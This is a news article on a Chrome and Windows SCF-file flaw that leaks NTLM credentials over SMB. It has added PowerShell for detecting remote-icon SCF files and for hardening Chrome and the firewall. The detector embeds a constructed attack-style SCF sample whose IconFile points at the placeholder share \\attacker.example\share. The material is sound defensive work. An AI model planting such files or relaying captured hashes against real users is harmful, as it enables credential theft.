A Google Chrome vulnerability uncovered by DefenseCode security engineer Bosko Stankovic is said to allow attackers to drop a malicious file onto a victim’s PC in order to steal the user’s Windows credentials and launch SMB (Server Message Block) relay attacks, according to security experts.
Stankovic wrote in a blog post that he found the flaw in the default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows, including Windows 10. The flaw shouldn’t worry only IT departments: it also poses a “significant threat” to large companies and even regular users. He also claimed that merely visiting a website that serves a malicious SCF (Shell Command File) file can cause victims to unknowingly hand their computer’s credentials to attackers via Chrome and the SMB protocol.
The technique that enables the credential theft is not new; it is a combination of two known techniques, one taken from the Stuxnet operation (Stuxnet, a powerful piece of malware specifically designed to sabotage Iran’s nuclear program) and the other demonstrated at a Black Hat security conference by two security researchers.
Stealing Windows Credentials Centered Around SCF files:
According to Stankovic, the attack is straightforward: the victim is lured to a malicious page (or clicks a link to one), and that visit alone triggers an automatic download of a Windows Explorer SCF file.
“SCF (Shell Command File) is a file format that supports a very limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin. Just like LNK files (shortcuts), SCF files, when stored on disk, will retrieve an icon file when the user loads the file in a Windows Explorer window.”
Stankovic explains that it’s very easy to get an SCF file onto a user’s computer. In its default configuration, Chrome automatically downloads files it deems safe without prompting the user for a location, and it treats SCF files as safe, so the user is never asked and never gets a chance to refuse.
The SCF file lies dormant until the victim opens the folder it was downloaded to. As soon as Windows Explorer renders that folder, it tries to fetch the file’s icon from the location named inside the file, which points to an SMB share on the attacker’s server, and Windows automatically authenticates to that share with the logged-in user’s credentials. This hands the attacker the victim’s username and an NTLMv2 challenge-response (often loosely called the password hash), which can be cracked offline or relayed to other services that accept NTLM authentication.
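The trait that makes the file dangerous is the one described above: an IconFile entry that names a UNC path, so viewing the folder opens an SMB session. The PowerShell below is an added example, not code from the article or from DefenseCode. It checks SCF text for exactly that trait and can sweep a downloads folder for such files; the two SCF samples it runs on are constructed here, and the host name attacker.example is a placeholder.

```powershell
# Added example, not part of the original article or DefenseCode's research.
# Flags SCF files whose IconFile points at a UNC path (\\host\share\...),
# which is what makes Explorer open an SMB session and authenticate as the user.

function Test-ScfRemoteIcon {
    <# Returns the UNC path if the SCF text pulls its icon from a remote
       share, or $null if the icon is local (or there is no IconFile key). #>
    param([Parameter(Mandatory)] [AllowEmptyString()] [string] $Content)
    # IconFile is an INI-style key under [Shell]; match case-insensitively,
    # one key per line, and require the value to start with two backslashes.
    if ($Content -match '(?im)^\s*IconFile\s*=\s*(\\\\[^\r\n]+)') {
        return $Matches[1].Trim()
    }
    return $null
}

function Get-RemoteIconScf {
    <# Scans a folder (by default the current user's Downloads) and reports
       every .scf file that would reach out over SMB when the folder is viewed. #>
    param([string] $Path = (Join-Path $env:USERPROFILE 'Downloads'))
    Get-ChildItem -Path $Path -Filter '*.scf' -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = Get-Content -Path $_.FullName -Raw -ErrorAction SilentlyContinue
            if (-not $text) { return }          # empty or unreadable file: skip
            $unc = Test-ScfRemoteIcon -Content $text
            if ($unc) {
                [pscustomobject]@{
                    File     = $_.FullName
                    IconFile = $unc
                    Created  = $_.CreationTime
                }
            }
        }
}

# --- Demo on constructed samples (kept in memory; nothing is written to disk) ---

# Benign SCF, the same shape as the classic "Show Desktop" shortcut: local icon.
$benign = @"
[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,3
[Taskbar]
Command=ToggleDesktop
"@

# Attack-style SCF: the icon lives on a remote share, so rendering the folder
# makes Windows authenticate to attacker.example (placeholder host) over SMB.
$malicious = @"
[Shell]
Command=2
IconFile=\\attacker.example\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"@

"benign    -> $(Test-ScfRemoteIcon -Content $benign)"
"malicious -> $(Test-ScfRemoteIcon -Content $malicious)"

# Real use, after an incident or as a scheduled sweep of user download folders:
# Get-RemoteIconScf | Format-Table -AutoSize
```

Only the second sample produces a UNC path. The same IconFile check applies to any folder a user is likely to browse in Explorer, not just Downloads, because the request is made at render time regardless of where the file landed.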
“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.
Defeating Windows Credential Theft:
The security researcher advises users to disable automatic downloads in Google Chrome. In the Chrome of the time this meant opening ‘Show Advanced Settings’ in Settings and ticking ‘Ask where to save each file before downloading’; in current versions the same checkbox sits under Settings > Downloads. This change forces Chrome to ask for your permission before downloading a file, which significantly reduces the risk of credential theft attacks using SCF files.
More advanced protection measures include blocking outbound SMB requests (TCP ports 139 and 445) from the local network to the WAN at the firewall, so local computers cannot reach SMB servers on the Internet and therefore never send their NTLM authentication to one.
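Both of those measures can be enforced centrally rather than left to each user. The PowerShell below is an added example, not from the article or from DefenseCode. It assumes an elevated prompt on Windows 8 / Server 2012 or later (for the NetSecurity firewall cmdlets), and it relies on the real Chrome machine policy PromptForDownloadLocation and the real per-user Chrome preference download.prompt_for_download; the rule name is the author's choice.

```powershell
# Added example, not part of the original article. Run from an elevated
# PowerShell prompt on Windows 8 / Server 2012 or later.

function Test-ChromePromptForDownload {
    <# Reads the current user's Chrome profile and reports whether
       "Ask where to save each file before downloading" is switched on.
       Returns $false when the preference is absent (Chrome's default). #>
    param([string] $ProfileName = 'Default')
    $prefs = Join-Path $env:LOCALAPPDATA "Google\Chrome\User Data\$ProfileName\Preferences"
    if (-not (Test-Path $prefs)) { return $false }
    $json = Get-Content -Path $prefs -Raw | ConvertFrom-Json
    return [bool]$json.download.prompt_for_download
}

# 1. Force the save-location prompt for every download via machine policy, so
#    it applies to all users and cannot be unticked on the Settings page.
$policyKey = 'HKLM:\SOFTWARE\Policies\Google\Chrome'
New-Item -Path $policyKey -Force | Out-Null
New-ItemProperty -Path $policyKey -Name 'PromptForDownloadLocation' `
    -PropertyType DWord -Value 1 -Force | Out-Null

# 2. Block outbound SMB (TCP 139 and 445) to non-local addresses. Explorer can
#    still reach intranet file servers, but a UNC IconFile aimed at an Internet
#    host gets no connection, so no NTLM authentication ever leaves the machine.
$ruleName = 'Block outbound SMB to Internet'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Protocol TCP `
        -RemotePort 139,445 -RemoteAddress Internet -Action Block | Out-Null
}

# 3. Show the resulting state for the current user and the machine.
"Chrome prompt_for_download (current user): $(Test-ChromePromptForDownload)"
Get-ItemProperty -Path $policyKey -Name PromptForDownloadLocation |
    Select-Object PromptForDownloadLocation
Get-NetFirewallRule -DisplayName $ruleName | Get-NetFirewallPortFilter |
    Select-Object Protocol, RemotePort
```

The host firewall rule protects laptops that leave the corporate network, where a perimeter firewall cannot help; on the internal network it is still worth applying the same block at the egress firewall so that machines without the rule are covered too.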